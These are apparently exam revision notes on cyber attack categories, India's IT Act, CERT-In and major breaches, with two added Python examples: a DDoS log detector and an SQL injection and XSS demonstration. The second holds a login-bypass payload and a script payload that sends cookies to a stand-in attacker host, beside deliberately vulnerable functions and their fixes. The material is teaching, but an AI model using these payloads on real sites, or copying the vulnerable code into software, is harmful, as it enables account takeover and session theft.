
Types of Cyber Attacks — Revision Notes

Version 1, updated 5 Mar 2026

⚡ 30-Second Revision

  • Network attacks: DDoS, MITM and DNS spoofing target communication infrastructure
  • Application attacks: SQL injection, XSS and zero-day exploits target software vulnerabilities
  • Social engineering: phishing, spear phishing and pretexting exploit human psychology
  • Physical attacks: USB drops, shoulder surfing and tailgating require direct access or observation
  • Insider threats: Malicious/negligent employees abuse legitimate access
  • State-sponsored: APTs conduct long-term espionage campaigns
  • Legal framework: IT Act Sections 43 (civil penalties), 66 (criminal), 69 (interception), 70 (protected systems)
  • Key institutions: CERT-In (incident response), NCIIPC (critical infrastructure)
  • Major incidents: 2016 debit card breach (3.2M affected), 2022 AIIMS ransomware

2-Minute Revision

Cyber attacks fall into six primary categories, each targeting a different kind of weakness. Network-based attacks such as DDoS overwhelm systems with traffic, while MITM attacks intercept communications in transit.

Application-layer attacks exploit software vulnerabilities through SQL injection (manipulating database queries) and XSS (injecting malicious scripts into web pages). Zero-day exploits target vulnerabilities unknown to the vendor, for which no patch yet exists, making them particularly dangerous.

Social engineering attacks manipulate human psychology - phishing uses deceptive emails, spear phishing targets specific individuals, while pretexting creates false scenarios. Physical attacks require direct access, including USB drops and shoulder surfing.

Insider threats involve employees misusing legitimate access, either maliciously or negligently. State-sponsored attacks represent sophisticated, persistent campaigns typically attributed to nation-states seeking strategic advantage.

India's legal framework includes IT Act 2000 with key sections: 43 (unauthorized access, civil penalties up to ₹1 crore), 66 (computer crimes, 3 years imprisonment), 69 (government interception powers), and 70 (protected systems, 10 years imprisonment).

CERT-In provides 24/7 incident response, while NCIIPC protects critical infrastructure. Major incidents include 2016 debit card breach affecting 3.2 million cards and 2022 AIIMS ransomware disrupting healthcare services, highlighting vulnerabilities in critical sectors.

5-Minute Revision

Comprehensive cyber attack taxonomy reveals the multifaceted nature of digital threats facing India's rapidly digitalizing economy. Network-based attacks target communication infrastructure through DDoS (overwhelming servers with traffic), Man-in-the-Middle attacks (intercepting communications), and DNS spoofing (redirecting users to malicious sites).
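The DDoS point above is easier to grasp with a concrete detection check. The following is an added example, not code from the original notes or from any named tool: a rate-based detector run over constructed web-server log lines in Common Log Format. It shows why a per-source threshold alone is not enough for a *distributed* flood, and adds a site-wide window that counts total requests and distinct sources. The IP addresses, timestamps and thresholds (20 requests per IP in 10 s, 100 requests site-wide in 5 s) are assumptions chosen for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Common Log Format: ip ident user [timestamp] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (source_ip, timestamp) for a CLF line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT)


def make_sample_log():
    """Constructed traffic, not a real capture: one ordinary client browsing,
    then 300 requests in three seconds spread over 30 source addresses
    (documentation ranges 203.0.113.0/24 and 198.51.100.0/24; assumed values)."""
    base = datetime(2024, 5, 12, 10, 0, 0, tzinfo=timezone.utc)
    lines = []

    def add(ip, t, path):
        lines.append(f'{ip} - - [{t.strftime(TS_FMT)}] "GET {path} HTTP/1.1" 200 512')

    for i in range(5):  # normal client: one request every 20 s
        add("203.0.113.5", base + timedelta(seconds=20 * i), f"/page{i}")
    for n in range(300):  # flood: each of 30 sources sends only 10 requests
        add(f"198.51.100.{n % 30 + 1}", base + timedelta(seconds=10, milliseconds=10 * n), "/")
    return lines


def _events(lines):
    # Parse, drop unparseable lines, and order by time so sliding windows are valid.
    return sorted(filter(None, map(parse_line, lines)), key=lambda e: e[1])


def per_source_floods(lines, threshold=20, window_s=10):
    """Sliding window per source IP. Returns {ip: peak_count} for every source
    that reaches `threshold` requests inside any `window_s`-second span."""
    recent = defaultdict(deque)
    flagged = {}
    for ip, ts in _events(lines):
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(q))
    return flagged


def aggregate_flood(lines, threshold=100, window_s=5):
    """Site-wide sliding window over all sources. This is what catches a
    distributed flood: each IP stays under the per-source limit, but the
    total request rate and the number of distinct sources both spike."""
    q = deque()
    peak_requests, peak_sources = 0, 0
    for ip, ts in _events(lines):
        q.append((ip, ts))
        while (ts - q[0][1]).total_seconds() > window_s:
            q.popleft()
        if len(q) > peak_requests:
            peak_requests = len(q)
            peak_sources = len({e[0] for e in q})
    return {"flood": peak_requests >= threshold,
            "peak_requests": peak_requests,
            "distinct_sources": peak_sources}


if __name__ == "__main__":
    log = make_sample_log()
    print("per-source (threshold 20):", per_source_floods(log))  # {} : every source is under the limit
    print("aggregate:", aggregate_flood(log))  # flood detected: 300 requests from 30 sources
```

With the constructed log, the per-source check flags nothing because no single address sends more than ten requests, while the aggregate check reports 300 requests from 30 distinct sources inside one 5-second window. Real deployments tune both thresholds against a baseline of normal traffic, since a legitimate surge (a news event, a sale) also raises the aggregate rate.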

Such network attacks can disrupt essential services and compromise data integrity during transmission. Application-layer attacks exploit software vulnerabilities: SQL injection manipulates database queries to extract or alter sensitive information, Cross-Site Scripting (XSS) injects malicious scripts into web pages served to other users, and zero-day exploits target vulnerabilities unknown to the vendor, before a patch is available.
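To make SQL injection and XSS concrete, here is an added example (not code from the original notes): a vulnerable login query and a vulnerable comment renderer, each beside its hardened form, run against a constructed in-memory SQLite table. The user records, payload strings and the attacker.example host are assumptions made up for the demonstration; a real system would also store password hashes rather than plaintext.

```python
import html
import sqlite3


def make_db():
    """In-memory SQLite database with a constructed users table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, so attacker-controlled input is
    parsed as SQL. Returns (username, role) of the first matching row, or None."""
    query = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the values as data, so quotes and
    comment markers in the input never change the statement's structure."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


def render_comment_vulnerable(comment):
    """Interpolates user text straight into HTML: a stored-XSS sink."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment):
    """Escapes <, >, &, and quotes so the browser renders the text as text
    instead of executing it as markup or script."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


# Classic payloads (constructed). The SQL one closes the username string, adds an
# always-true condition and comments out the password check with "--".
SQLI_PAYLOAD = "' OR 1=1 --"
XSS_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, SQLI_PAYLOAD, "x"))  # ('alice', 'admin')
    print("safe login:      ", login_safe(db, SQLI_PAYLOAD, "x"))        # None
    print(render_comment_vulnerable(XSS_PAYLOAD))  # script tag survives intact
    print(render_comment_safe(XSS_PAYLOAD))        # &lt;script&gt;... rendered as text
```

The injected query reads `... WHERE username = '' OR 1=1 --' AND password = 'x'`, which matches every row and returns the first one, the admin account, without any password. The parameterised version sends the same string as a bound value and finds no such user. Escaping on output is the equivalent defence for XSS: the payload is still stored, but the browser receives `&lt;script&gt;` and displays it rather than running it.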

The sophistication of application-layer attacks has increased significantly, with state actors investing heavily in zero-day research. Social engineering attacks treat humans as the weakest link in security, employing phishing (deceptive communications), spear phishing (targeted attacks on specific individuals), pretexting (fabricated scenarios), and baiting (exploiting curiosity through infected devices left for the target to pick up).

These attacks have evolved from obvious spam to sophisticated campaigns researching targets extensively. Physical attacks demonstrate that cyber security extends beyond digital boundaries, including USB drops (leaving infected devices), shoulder surfing (observing password entry), and tailgating (following authorized personnel).

Insider threats pose unique challenges as they involve individuals with legitimate access - malicious insiders deliberately abuse privileges while negligent employees create vulnerabilities through careless practices.

State-sponsored attacks represent the most sophisticated category, characterized by Advanced Persistent Threat (APT) techniques involving long-term network presence, custom malware, and strategic objectives beyond financial gain.

India's legal response framework centers on IT Act 2000 with 2008 amendments addressing emerging threats. Section 43 covers unauthorized access with civil penalties up to ₹1 crore, Section 66 criminalizes computer-related offenses with imprisonment up to three years, Section 69 empowers government interception and monitoring, while Section 70 addresses protected systems with enhanced penalties up to 10 years imprisonment.

The Indian Penal Code supplements these provisions through its cheating (419, 420) and forgery (463-468) sections; the IPC has since been replaced by the Bharatiya Nyaya Sanhita 2023, in force from 1 July 2024. Institutional response involves CERT-In (the Indian Computer Emergency Response Team) providing 24/7 incident monitoring and response capabilities, NCIIPC protecting critical information infrastructure, and specialised cyber crime investigation units.

Recent incidents demonstrate evolving threat landscape: the 2016 debit card breach affected 3.2 million cards across multiple banks, the 2018 Cosmos Bank attack resulted in ₹94 crore losses through coordinated ATM and SWIFT attacks, and the 2022 AIIMS ransomware attack disrupted healthcare services for weeks.

These incidents highlight the intersection of cyber security with national security, economic stability, and essential service delivery in digital India.

Prelims Revision Notes

  1. IT Act 2000 Key Sections: Section 43 (unauthorized access, civil penalties ₹1 crore max), Section 66 (computer crimes, 3 years imprisonment), Section 66A (struck down by the Supreme Court in 2015, Shreya Singhal v. Union of India), Section 69 (government interception powers), Section 70 (protected systems, 10 years imprisonment)
  2. Attack Classifications: Network (DDoS, MITM, DNS spoofing), Application (SQL injection, XSS, zero-day), Social Engineering (phishing, spear phishing, pretexting, baiting), Physical (USB drops, shoulder surfing, tailgating), Insider (malicious/negligent employees), State-sponsored (APTs)
  3. Key Institutions: CERT-In (Indian Computer Emergency Response Team, 24/7 incident response), NCIIPC (National Critical Information Infrastructure Protection Centre), MeitY (policy formulation), CBI Cyber Crime Cell
  4. Major Incidents with Dates: 2016 debit card breach (3.2 million cards affected), 2018 Cosmos Bank attack (₹94 crore loss), 2022 AIIMS ransomware (healthcare services disrupted), Mobikwik data breach (2020 data, reported 2021; about 100 million users)
  5. Legal Penalties: IT Act civil penalties up to ₹1 crore, criminal provisions 3-10 years imprisonment, IPC sections 419-420 (cheating) and 463-468 (forgery) applicable to cyber crimes (now carried over into the Bharatiya Nyaya Sanhita 2023)
  6. Attack Characteristics: Zero-day (vulnerability unknown to the vendor, no patch available), APT (long-term persistence), DDoS (traffic flooding), Phishing (deceptive communication), SQL injection (database manipulation)
  7. Recent Policy Updates: CERT-In directions 2022 (6-hour incident reporting), National Cyber Security Strategy 2020, Digital Personal Data Protection Act 2023 (which replaced the withdrawn Personal Data Protection Bill)
  8. International Examples: Stuxnet (2010, Iranian nuclear enrichment facilities), WannaCry (global ransomware, 2017), SolarWinds (supply chain attack, 2020), Equifax breach (2017, 147 million affected)

Mains Revision Notes

  1. Analytical Framework for Cyber Attacks: Threat Actor Analysis (cybercriminals, hacktivists, nation-states, insiders) → Attack Vector Assessment (network, application, social, physical) → Impact Evaluation (confidentiality, integrity, availability) → Response Strategy (prevention, detection, response, recovery)
  2. Evolution of Threat Landscape: Phase 1 (2000-2010): Individual hackers, simple malware, opportunistic attacks; Phase 2 (2010-2020): Organized cybercrime, financial motivation, sophisticated tools; Phase 3 (2020-present): State-sponsored campaigns, critical infrastructure targeting, AI-powered attacks
  3. Attribution Challenges: Technical obfuscation through proxy servers and anonymization tools, false flag operations mimicking other threat actors, legal complexities in cross-border investigations, time-sensitive evidence collection requirements
  4. Critical Infrastructure Vulnerabilities: Power grid SCADA systems susceptible to network attacks, financial sector exposure to APTs and insider threats, telecommunications infrastructure targeted for espionage, healthcare systems vulnerable to ransomware attacks
  5. Human Factor in Cyber Security: Social engineering success rates 60-90% due to psychological manipulation, cultural factors affecting security awareness, remote work expanding attack surfaces, need for continuous security training and awareness programs
  6. Legal Framework Gaps: Jurisdictional challenges in cyberspace, evidence collection and preservation difficulties, need for specialized cyber courts and trained personnel, balancing security measures with privacy rights and civil liberties
  7. International Cooperation Requirements: Mutual Legal Assistance Treaties (MLATs) for cross-border investigations, information sharing mechanisms with allied nations, capacity building programs for developing countries, diplomatic responses to state-sponsored attacks
  8. Emerging Threats and Future Challenges: AI-powered attacks adapting to defensive measures, quantum computing threats to current encryption, IoT device proliferation expanding attack surfaces, deepfake technology enabling sophisticated disinformation campaigns

Vyyuha Quick Recall

Vyyuha Quick Recall - SHIELD Framework for Cyber Attack Types: S - Social engineering attacks (phishing, spear phishing, pretexting) exploiting human psychology and trust relationships; H - Hardware and physical attacks (USB drops, shoulder surfing, tailgating) requiring direct access to systems or observation; I - Insider threats from malicious employees or negligent staff abusing legitimate access privileges; E - External network attacks (DDoS, Man-in-the-Middle, DNS spoofing) targeting communication infrastructure; L - Logic and application attacks (SQL injection, XSS, zero-day exploits) exploiting software vulnerabilities; D - Data breaches and state-sponsored espionage (APTs) conducting long-term intelligence gathering campaigns.

Memory aid: 'SHIELD protects against all cyber attack vectors' - each letter represents a major attack category that comprehensive cyber security must address.
